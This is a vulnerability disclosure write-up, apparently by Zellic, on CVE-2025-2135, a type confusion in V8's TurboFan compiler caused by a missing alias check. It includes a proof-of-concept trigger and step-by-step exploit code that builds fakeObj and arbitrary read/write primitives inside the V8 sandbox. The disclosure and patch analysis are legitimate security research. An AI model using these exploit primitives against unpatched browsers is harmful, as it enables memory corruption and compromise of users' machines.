We discovered a type-confusion vulnerability in Chrome’s V8 engine that can be exploited to achieve remote code execution. The bug was assigned CVE-2025-2135, and we successfully used it to pwn Google’s V8CTF as a zero-day.
The root cause lies in TurboFan’s InferMapsUnsafe() function, which fails to handle aliasing when processing the newly introduced TransitionElementsKindOrCheckMap node. This allows attackers to trigger type confusion between object arrays and double arrays, leading to arbitrary memory read/write within the V8 sandbox.
In this post, we’ll walk through the bug’s root cause, demonstrate a proof of concept, detail the step-by-step exploitation process, and examine how Google patched the vulnerability.
Check out the full CVE-2025-2135 bug report here↗.
Background
Before diving into the vulnerability, let’s cover some foundational concepts about V8, Chrome’s JavaScript engine. If you’re already familiar with V8 internals, feel free to skip ahead to the Root Cause Analysis.
V8 and Just-In-Time Compilation
V8 is the JavaScript engine that powers Google Chrome and Node.js. Its primary job is to parse and execute JavaScript as efficiently as possible. To achieve near-native performance, V8 uses a multi-tiered execution pipeline: code starts in an interpreter called Ignition, and as functions are called repeatedly, hot code paths are progressively promoted to more aggressive just-in-time (JIT) compilers that generate optimized machine code.

TurboFan is V8’s most aggressive optimizing compiler. It collects runtime type feedback from the interpreter, such as “this variable has always been an integer” or “this array has always contained doubles”, and uses those observations to generate highly specialized machine code. This speculative optimization delivers excellent performance when the assumptions hold, but if they are violated at runtime, V8 must deoptimize and fall back to the interpreter.
Vulnerabilities emerge when the compiler makes an incorrect assumption but fails to deoptimize. The generated machine code then operates on data with the wrong type in mind, leading to type confusion.
Maps: V8’s Hidden Classes
JavaScript is dynamically typed, meaning objects can have properties added or removed at any time. To optimize property access despite this flexibility, V8 assigns each object a Map (also known as a “hidden class” or “shape” in other engines). A Map describes an object’s layout: what properties it has, their types, and where they are stored in memory.
// These two objects share the same Map (same structure)
let a = { x: 1, y: 2 };
let b = { x: 3, y: 4 };
// Adding a property transitions 'a' to a new Map
a.z = 5; // 'a' and 'b' now have different Maps
When two objects share the same Map, V8 can access their properties at fixed memory offsets instead of performing expensive dictionary lookups. The JIT compiler inserts Map checks to verify objects have the expected layout before executing optimized code. If a check fails, execution deoptimizes.
How V8 Classifies Arrays: ElementsKind
Beyond object properties, V8 also tracks the types of values stored in arrays through a system called ElementsKind. Rather than using a single generic representation, V8 specializes array storage based on element types. An array containing only small integers is classified as PACKED_SMI_ELEMENTS and stored as tagged integers, which is the most memory-efficient layout. When a floating-point number is introduced, the array transitions to PACKED_DOUBLE_ELEMENTS, where values are stored as raw, unboxed 64-bit doubles. If an arbitrary JavaScript object is stored, it transitions further to PACKED_ELEMENTS, where values are stored as tagged pointers.

These transitions are irreversible. Once an array moves from SMI to DOUBLE by storing a float, or from DOUBLE to ELEMENTS by storing an object, it never transitions back. Each ElementsKind corresponds to a different Map, and the JIT compiler generates specialized machine code for each variant.
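To make the transition lattice concrete, here is a minimal sketch in plain JavaScript. The ElementsKind names in the comments describe V8's internal bookkeeping and are not observable from script (d8's %DebugPrint would show them); the comments state what V8 does for this exact sequence under the rules above.

```javascript
// Sketch of one-way ElementsKind transitions. The kind names in the
// comments describe V8's internal state; plain JavaScript cannot
// observe them directly (d8's %DebugPrint can).
const arr = [1, 2, 3]; // PACKED_SMI_ELEMENTS: tagged small integers

arr.push(4.5);         // -> PACKED_DOUBLE_ELEMENTS: every element is
                       //    re-stored as a raw, unboxed 64-bit double

arr.push({});          // -> PACKED_ELEMENTS: every element is re-stored
                       //    as a tagged (compressed) pointer

arr.pop();             // removing the object does NOT transition back;
arr.pop();             // the array remains PACKED_ELEMENTS from now on
```

Because transitions are one-way, a single stray float or object permanently changes the array's layout, which is why the JIT cares so much about which Map an array currently has.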
The reason these different storage formats matter comes down to how V8 represents values in memory. V8 uses a technique called pointer tagging to distinguish between value types at runtime. With V8’s pointer compression on 64-bit systems, each value slot in a PACKED_ELEMENTS array is 32 bits wide, and the lowest bit serves as a tag: if it is 0, the value is a small integer (Smi) with the actual number shifted left by one bit; if it is 1, the value is a compressed pointer to a heap object. A PACKED_DOUBLE_ELEMENTS array, by contrast, stores raw IEEE 754 64-bit floating-point values with no tagging at all, each occupying a full 64-bit slot. The same bit pattern in memory therefore has a completely different meaning depending on which ElementsKind the executing code assumes.

This distinction is security-critical. If the compiler believes an array is PACKED_DOUBLE_ELEMENTS but the array actually holds tagged object pointers, a read will reinterpret two adjacent 32-bit tagged values as a single 64-bit float, leaking pointer information. Conversely, a write will inject a raw 64-bit double into slots that V8 later treats as tagged pointers, allowing an attacker to forge arbitrary object references. This is type confusion, and it is exactly the class of vulnerability we exploit in this post.
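The bit-level aliasing can be modeled from script with two typed-array views over one buffer. This is a model only: real tagged slots live in V8's compressed heap, not in an ArrayBuffer, and the layout shown assumes a little-endian machine.

```javascript
// Model of type confusion at the bit level: the same 8 bytes read as
// one raw IEEE 754 double or as two 32-bit slots (which V8 would treat
// as Smis or compressed pointers). Assumes a little-endian platform.
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf); // "double array" view
const u32 = new Uint32Array(buf);  // "tagged slots" view

f64[0] = 0.1;                   // write one unboxed double...
const lo = u32[0], hi = u32[1]; // ...read it back as two 32-bit halves

// lo = 0x9999999a, hi = 0x3fb99999. hi has its low bit set, so code
// that believes these slots hold tagged values would decode it as a
// compressed heap pointer (lo, with its low bit clear, reads as a Smi).
// An attacker-chosen double therefore forges pointer values.
```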
Sea of Nodes and the Effect Chain
During JIT compilation, V8 converts JavaScript into an intermediate representation (IR) called a sea of nodes. If you’re familiar with LLVM’s SelectionDAG↗, sea of nodes is a similar concept. Unlike a traditional control-flow graph where instructions are ordered sequentially within basic blocks, the sea of nodes represents the program as a graph where each node is a single operation. Edges between nodes encode three kinds of dependencies:
- Value edges carry computed results between operations. For example, an add node has value edges pointing to its two operands x and 1. These are the data-flow dependencies you would find in any dataflow graph.
- Control edges enforce execution ordering at branch points and merges, similar to edges in a traditional control-flow graph. A conditional like if (x > 0) produces control edges to its true and false branches.
- Effect edges link operations that have observable side effects such as memory reads, writes, or function calls. Pure computations (like local arithmetic) have no effect edges and can float freely in the graph, giving the optimizer maximum flexibility to reorder them. Only side-effecting operations are constrained by the effect chain.
To illustrate effect edges concretely, consider the following expression:
obj[x] = obj[x] + 1;
The property load must happen before the addition, and the addition before the store. Effect edges enforce this ordering, forming a chain: JSLoadNamed → SpeculativeSafeIntegerAdd → JSStoreNamed (with an intermediate Checkpoint node for deoptimization). The following Turbolizer screenshot shows this effect chain in practice (dotted lines represent effect edges):
![Effect chain for obj[x] = obj[x] + 1](https://blog-cdn.zellic.io/blog/assets/images/doar-e-effects-b58ce546f39617738f69476ecb346dc5.png)
Effect chain for obj[x] = obj[x] + 1 [1]

The effect edges form a chain that records the ordering of all side-effecting operations. When TurboFan determines what Map an object has at a given point in the program, it walks backward along this effect chain, searching for witness nodes that constrain the object’s Map, such as a CheckMaps node or an ElementsKind transition node. For those familiar with symbolic execution, traversing a witness node in TurboFan is analogous to crossing a type assertion, which corresponds to adding a solver constraint. Once the traversal finds a CheckMaps(Map A), the compiler asserts the object’s Map is exactly Map A at that point, eliminating all other possibilities. Of course, this is just an analogy.
However, if the traversal passes through a node with potential side effects (like a function call) before finding a witness, the inferred Map is considered unreliable, since the side effect could have changed the object’s Map. This backward traversal is performed by a function called InferMapsUnsafe(), and it is where the vulnerability in this post ultimately lies.

Is the effect chain always linear?
In straight-line code, yes. Each side-effecting node has exactly one effect input and one effect output, forming a linear chain. The code confirms this with DCHECK_EQ(1, effect->op()->EffectInputCount()).
But at control flow merge points, the effect chain is not linear. V8 uses EffectPhi nodes to merge multiple effect chains (one from each branch). Looking at InferMapsUnsafe() in node-properties.cc, here’s how it handles this:
- If/else merge (EffectPhi with a Merge control): it gives up and returns kNoMaps (no inference possible, because the Map could differ on each branch).
- Loop (EffectPhi with a Loop control): it follows the loop’s entry edge (effect input 0, i.e. outside the loop) and continues walking backwards, but marks the result as kUnreliableMaps, because the loop body might have changed the Map.
- Unknown nodes with multiple effect inputs: it also gives up and returns kNoMaps.
So InferMapsUnsafe() can walk backwards precisely because it only walks along a single linear chain. The moment it hits an EffectPhi (where chains merge), it either bails out entirely or takes the conservative path.
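As a thought experiment, the walk can be modeled in a few lines. The node shapes and opcode set here are invented for illustration; the real logic in node-properties.cc handles far more cases.

```javascript
// Toy model of InferMapsUnsafe()'s backward walk over the effect chain.
// Node shapes ({opcode, inputs, ...}) are hypothetical, not V8's.
function inferMaps(receiver, effect) {
  let result = "kReliableMaps";
  while (effect) {
    switch (effect.opcode) {
      case "CheckMaps": // witness: pins the receiver's Map exactly
        if (effect.object === receiver) return { result, maps: effect.maps };
        break;
      case "Call": // unknown side effect: the Map may have changed here
        result = "kUnreliableMaps";
        break;
      case "EffectPhi":
        if (effect.control === "Merge") return { result: "kNoMaps" };
        // Loop: follow the entry edge, but the body may change the Map
        result = "kUnreliableMaps";
        effect = effect.inputs[0];
        continue;
    }
    // Stop once we hit the receiver's own definition on the chain.
    if (effect === receiver) return { result: "kNoMaps" };
    effect = effect.inputs[0]; // the single linear effect input
  }
  return { result: "kNoMaps" };
}
```

In this model, finding a CheckMaps for the receiver after passing a Call still yields a Map, but only with kUnreliableMaps — the conservatism a correct witness handler must apply.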
Root Cause Analysis
To understand this vulnerability, we first need to examine TurboFan’s JIT compilation pipeline. The diagram below illustrates how JavaScript code flows through various optimization phases before becoming machine code.

Type Speculation
As introduced in the Background section, TurboFan operates on a sea-of-nodes IR and walks the effect chain to infer object Maps. The TurboFan optimizer performs a series of aggressive optimizations on this graph representation. During the JSNativeContextSpecialization phase, the compiler leverages runtime feedback (ElementAccessFeedback) to narrow down types for element access operations.
When processing reads and writes on arrays and array-like objects, the optimizer first checks whether the access site is monomorphic, meaning the feedback indicates all observed accesses share the same element layout.
The Monomorphic Optimization Path
When access is monomorphic (access_infos.size() == 1), TurboFan checks whether the receiver needs an ElementsKind transition. Monomorphic access implies that subsequent optimizations depend on a stable, predictable element layout. If the receiver is not already in the target layout, TurboFan explicitly inserts a transition node in the IR to ensure consistent type assumptions for downstream optimizations.
The relevant code is shown below:
// src/compiler/js-native-context-specialization.cc
Reduction JSNativeContextSpecialization::ReduceElementAccess(
Node* node, Node* index, Node* value,
ElementAccessFeedback const& feedback) {
...
// Check for the monomorphic case.
PropertyAccessBuilder access_builder(jsgraph(), broker());
if (access_infos.size() == 1) {
ElementAccessInfo access_info = access_infos.front();
if (!access_info.transition_sources().empty()) {
DCHECK_EQ(access_info.lookup_start_object_maps().size(), 1);
// Perform possible elements kind transitions.
MapRef transition_target = access_info.lookup_start_object_maps().front();
ZoneRefSet<Map> sources(access_info.transition_sources().begin(),
access_info.transition_sources().end(),
graph()->zone());
effect = graph()->NewNode(simplified()->TransitionElementsKindOrCheckMap(
ElementsTransitionWithMultipleSources(
sources, transition_target)),
receiver, effect, control);
} else {
// Perform map check on the {receiver}.
access_builder.BuildCheckMaps(receiver, &effect, control,
access_info.lookup_start_object_maps());
}
// Access the actual element.
ValueEffectControl continuation =
BuildElementAccess(receiver, index, value, effect, control, context,
access_info, feedback.keyed_mode());
value = continuation.value();
effect = continuation.effect();
control = continuation.control();
} else {
...
}
ReplaceWithValue(node, value, effect, control);
return Replace(value);
}
When feedback indicates the receiver may originate from multiple ElementsKind sources (e.g., some objects are still PACKED_SMI_ELEMENTS while the target layout is PACKED_ELEMENTS), TurboFan wraps all source Maps into a ZoneRefSet<Map> and constructs an ElementsTransitionWithMultipleSources structure. It then generates a TransitionElementsKindOrCheckMap IR node with two semantic branches:
- If the receiver’s Map belongs to the source set, perform an ElementsKind transition to the target layout.
- If already in the target layout, perform a Map check to verify optimization assumptions.
Through this node, the element layout along the access path is forced to converge to a unified Map, establishing a stable foundation for subsequent optimizations.
Map Inference
After the JSNativeContextSpecialization phase, TurboFan attempts to infer the receiver’s actual Map under the current effect state. This work is performed by NodeProperties::InferMapsUnsafe(), which traverses up the effect chain looking for witness nodes that constrain the receiver’s Map, such as CheckMap, Allocate, or TransitionElementsKindOrCheckMap.
To describe the reliability of inference results, V8 defines the following enumeration:
// Walks up the {effect} chain to find a witness that provides map
// information about the {receiver}. Can look through potentially
// side effecting nodes.
enum InferMapsResult {
kNoMaps, // No maps inferred.
kReliableMaps, // Maps can be trusted.
kUnreliableMaps // Maps might have changed (side-effect).
};
This enumeration determines whether the optimizer can rely on the inferred Map.
- kNoMaps — No node providing Map information was found; the optimizer cannot use Map-dependent optimization paths.
- kReliableMaps — A sufficiently strong witness was found (such as CheckMap or an ElementsKind transition), indicating the receiver has a unique and dependable Map after that node.
- kUnreliableMaps — The traversal passed through nodes with potential side effects that could change the receiver’s Map; although a Map was inferred, it cannot be fully trusted.
Here is the key snippet from InferMapsUnsafe() handling TransitionElementsKindOrCheckMap:
// static
NodeProperties::InferMapsResult NodeProperties::InferMapsUnsafe(
JSHeapBroker* broker, Node* receiver, Effect effect,
ZoneRefSet<Map>* maps_out) {
...
InferMapsResult result = kReliableMaps;
while (true) {
switch (effect->opcode()) {
...
case IrOpcode::kTransitionElementsKindOrCheckMap: {
Node* const object = GetValueInput(effect, 0);
if (IsSame(receiver, object)) {
*maps_out = ZoneRefSet<Map>{
ElementsTransitionWithMultipleSourcesOf(effect->op()).target()};
return result;
}
break;
}
...
}
// Stop walking the effect chain once we hit the definition of
// the {receiver} along the {effect}s.
if (IsSame(receiver, effect)) return kNoMaps;
// Continue with the next {effect}.
DCHECK_EQ(1, effect->op()->EffectInputCount());
effect = NodeProperties::GetEffectInput(effect);
}
The intended logic is that when a transition node operates on the receiver itself, the receiver’s Map has been forcibly transitioned to the unique target Map, so kReliableMaps can be returned immediately. This check is safe when the target object is unambiguous and unique.
The Root Cause: Missing Alias Check
The vulnerability stems from a complete lack of aliasing checks in this logic. The diagram below illustrates the problematic code path.

As shown, IsSame(receiver, object) checks whether two nodes resolve to the same IR node, looking past CheckHeapObject and TypeGuard wrappers. However, in the sea-of-nodes model, two structurally different IR nodes (e.g., two distinct Parameter nodes for different function arguments) can reference the same underlying HeapObject at runtime. This means even when the condition is false, receiver and object may still alias the same object.
Let’s look at the code again. What happens if IsSame is false?
InferMapsResult result = kReliableMaps;
while (true) {
switch (effect->opcode()) {
...
case IrOpcode::kTransitionElementsKindOrCheckMap: {
Node* const object = GetValueInput(effect, 0);
if (IsSame(receiver, object)) { // <--- What happens if IsSame is false?
*maps_out = ZoneRefSet<Map>{
ElementsTransitionWithMultipleSourcesOf(effect->op()).target()};
return result;
}
break;
}
...
}
...
}
If IsSame is false, the traversal simply continues through the loop and may ultimately return kReliableMaps. That result isn’t necessarily valid: the walk may have passed a TransitionElementsKindOrCheckMap node that in fact affected receiver, because object and receiver are different IR nodes that refer to the same HeapObject at runtime.
When the two nodes alias, the following occurs:
- The object’s ElementsKind has already been transitioned at the transition node.
- Since receiver and object may be aliases, this transition also affects receiver. However, InferMapsUnsafe() skips this case when IsSame(receiver, object) == false, not treating it as a witness affecting the receiver’s Map.
- Subsequent effect chain traversal also fails to record the uncertainty introduced by this transition.
- As a result, the function incorrectly returns kReliableMaps instead of the safer kUnreliableMaps.
The optimizer then performs type specialization based on the incorrect assumption that the receiver’s Map is stable, while the actual object layout has already been transitioned. The generated machine code interprets the object with incorrect layout, ultimately causing type confusion.
In summary, the missing alias check causes InferMapsUnsafe() to incorrectly assess Map reliability, leading the optimizer to generate unsafe code based on invalidated type assumptions. This is the root cause of the vulnerability.
Proof of Concept
The following proof of concept (POC) reproduces the type-inference vulnerability described above in a minimal way:
function main() {
function f0(v2, v3) {
// These element accesses collect type feedback. During optimization,
// TurboFan inserts TransitionElementsKindOrCheckMap nodes based on this feedback.
var v4 = v3[0]; // Node B (v3) in the root cause diagram
var v5 = v2[0]; // Node A (v2, the receiver) in the root cause diagram
// indexOf is a Call node (side effect) in the effect chain.
Array.prototype.indexOf.call(v3);
}
%PrepareFunctionForOptimization(f0);
var v0 = new Array(1);
v0[0] = 'tagged';
// First call: v2=v0 (HOLEY_ELEMENTS), v3=[1] (PACKED_SMI_ELEMENTS)
// This collects monomorphic type feedback for the element accesses.
f0(v0, [1]);
var v1 = new Array(1);
v1[0] = 0.1;
%OptimizeFunctionOnNextCall(f0);
// Second call: v2 and v3 are BOTH v1 (HOLEY_DOUBLE_ELEMENTS).
// In the IR, v2 and v3 are different Parameter nodes (Node A and Node B),
// but at runtime they reference the same HeapObject.
f0(v1, v1);
}
main();
main();
// flags: --allow-natives-syntax
The core purpose of this POC is to make TurboFan form a stable but incorrect set of type assumptions during the optimization of f0. The first call provides monomorphic feedback for array access, while the second call uses a completely different ElementsKind, forcing the optimizer to rely on the Map-inference logic analyzed earlier. It is precisely during this inference phase that, due to the lack of alias checking for parameters, InferMapsUnsafe() incorrectly determines that the current array’s Map is reliable, continuing optimization along the incorrect type path.
Running this POC on a debug build of d8 confirms the type confusion. The runtime expects a FixedDoubleArray (because the JIT-compiled code assumes double elements), but encounters a FixedArray (object elements) instead:
# Fatal error in ../../src/objects/object-type.cc, line 82
# Type cast failed in CAST(elements) at ../../src/builtins/builtins-array-gen.cc:1353
Expected FixedDoubleArray but found 0x32ae00288a31: [FixedArray]
- map: 0x32ae00000565 <Map(FIXED_ARRAY_TYPE)>
- length: 1
0: 0x32ae00288a3d <HeapNumber 0.1>
Exploitation
Based on the root cause analysis, the issue does not originate from indexOf itself but from the compiler’s incorrect type inference for v3, leading to type confusion. This erroneous type information allows attackers to trigger a series of abnormal behaviors, ultimately achieving arbitrary memory read/write within the V8 sandbox.
Let’s take a look at the exploitation step-by-step.
Step 1: Trigger type confusion to obtain a fakeObj primitive.
The following diagram shows how the type confusion manifests when the compiler misinterprets array element types.

When the compiler incorrectly infers v3 as a double array, we can exploit this by replacing indexOf with push. The push operation writes an eight-byte double value directly into the element storage area, but since v3 is actually an object array, the double data is interpreted by V8 as an object pointer.
function f0(v2, v3) {
var v4 = v3[0];
var v5 = v2[0];
// v3 is incorrectly inferred as double array due to aliasing
// This push writes a crafted double that will be interpreted as an object pointer
Array.prototype.push.call(v3, 4.950618252845e-311);
}
By crafting this double value to point to a memory region we control, we obtain the classic fakeObj primitive, allowing us to disguise an arbitrary memory address as a legitimate JavaScript object.
Step 2: Heap layout for a fake array.
We carefully arrange a forged JSArray structure in memory. The key fields are map, properties, elements, and length:
// Layout: map | properties | elements | length
// 0x00189c39 0x00000745 0x000495bd 0x00000466
fake_arr_buf = [
3.9490349638436e-311, 2.3893674090823e-311,
1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1
];
helper.mark_sweep_gc(); // Stabilize heap layout
Step 3: Trigger and retrieve the fake object.
After triggering the vulnerability with aliased arguments, we retrieve our fake array object. Recall that in Step 1, the type-confused push wrote a crafted 8-byte double into v1’s backing store. Because v1 is actually an object array, V8 interprets those bytes as a tagged pointer when reading them back. The double was crafted so that it decodes to a compressed pointer pointing into fake_arr_buf’s backing store, exactly where the fake JSArray structure is laid out. Because each double element occupies 8 bytes while each tagged pointer slot is only 4 bytes, the single pushed double spans two object-array slots; reading v1[2] retrieves the upper half, which is the forged pointer to our fake array:
f0(v1, v1); // v1 passed as both v2 and v3, triggering the alias issue
v1[5] = 0.1; // Ensure array is in expected state
fake_arr = v1[2]; // The crafted double is now interpreted as a pointer to our fake JSArray
Step 4: Construct arbitrary read/write primitives.
With our fake array, we can control its elements pointer to achieve arbitrary memory access. By pointing elements to any address, subsequent array accesses read from or write to that location:
function arbRead(where) {
fake_arr_buf[1] = helper.pair_i32_to_f64(where - 8, 0x60000);
return helper.f64toi64(fake_arr[0]);
}
function arbWrite(where, what) {
fake_arr_buf[1] = helper.pair_i32_to_f64(where - 8, 0x60000);
fake_arr[0] = helper.i64tof64(what);
}
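The helper conversion routines used above are not shown in the post; a typical implementation (our hypothetical reconstruction, following standard exploit boilerplate) reinterprets bits through typed-array views over one shared buffer:

```javascript
// Hypothetical reconstruction of the post's `helper` conversions; the
// actual helper object is not shown in full. Assumes little-endian.
const _buf = new ArrayBuffer(8);
const _f64 = new Float64Array(_buf);
const _u32 = new Uint32Array(_buf);
const _u64 = new BigUint64Array(_buf);

// Pack two 32-bit values (lo, hi) into the bits of one double.
function pair_i32_to_f64(lo, hi) {
  _u32[0] = lo >>> 0;
  _u32[1] = hi >>> 0;
  return _f64[0];
}

// Reinterpret a double's bits as a 64-bit BigInt, and back.
function f64toi64(v) { _f64[0] = v; return _u64[0]; }
function i64tof64(v) { _u64[0] = BigInt(v); return _f64[0]; }
```

With helpers of this shape, arbRead above forges the fake array’s elements pointer by packing the target address and a plausible length word into a single double.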
Step 5: Exploit the bug.
Finally, we demonstrate the arbitrary write capability by modifying a victim array’s length field:
var victim_array = [1.1, 1.2];
console.log("Before: " + victim_array.length); // 2
arbWrite(0x4017d + 1 + 0xc, 0x2333n);
console.log("After: " + victim_array.length); // 0x2333
At this point, we have full arbitrary memory read/write within the V8 sandbox, laying the foundation for code execution and sandbox escape.
We successfully exploited this vulnerability in Google’s V8CTF program↗, achieving a confirmed zero-day submission on March 6, 2025.

Patch Analysis
The fix is straightforward. In InferMapsUnsafe(), when encountering a TransitionElementsKindOrCheckMap node where the target object is not the same node as the receiver, set result = kUnreliableMaps before continuing the effect chain traversal. This acknowledges that the two nodes may alias at runtime, and therefore the Map inference cannot be trusted.
case IrOpcode::kTransitionElementsKindOrCheckMap: {
Node* const object = GetValueInput(effect, 0);
if (IsSame(receiver, object)) {
*maps_out = ZoneRefSet<Map>{...};
return result;
}
// Fix: mark as unreliable when receiver and object may alias
result = kUnreliableMaps;
break;
}
A Recurring Pattern
This vulnerability was introduced by commit b8d3f7d0cf↗, which added the TransitionElementsKindOrCheckMap IR node to optimize Map loads. The pattern is familiar: a new IR node is introduced for performance gains, but its side effects are not fully accounted for in InferMapsUnsafe(), leading to type confusion.
This is not the first time. CVE-2020-6418 had the same issue with JSCreate nodes. More broadly, CVE-2020-16009 and CVE-2021-30632 show that V8’s Map-tracking mechanisms remain a recurring attack surface. Every time a new optimization lands, there’s a chance the Map-inference logic hasn’t caught up.
Interestingly, when we first fuzzed out this bug, we hadn’t done any root cause analysis. We replaced indexOf with push on a hunch, and just like that, we had a working fakeObj primitive. V8 type confusions are becoming so formulaic that exploitation feels like muscle memory.
About Us
Zellic specializes in securing emerging technologies. Our security researchers have uncovered vulnerabilities in the most valuable targets, from Fortune 500s to DeFi giants.
Developers, founders, and investors trust our security assessments to ship quickly, confidently, and without critical vulnerabilities. With our background in real-world offensive security research, we find what others miss.
Contact us↗ for an audit that’s better than the rest. Real audits, not rubber stamps.
References
[1] Jeremy Fetiveau, “Introduction to TurboFan,” doar-e.github.io, 2019. https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/↗
[2] Alex Maclean and Justin Fargnoli, “A Beginner’s Guide to SelectionDAG,” LLVM Dev Meeting, 2024. https://llvm.org/devmtg/2024-10/slides/tutorial/MacLean-Fargnoli-ABeginnersGuide-to-SelectionDAG.pdf↗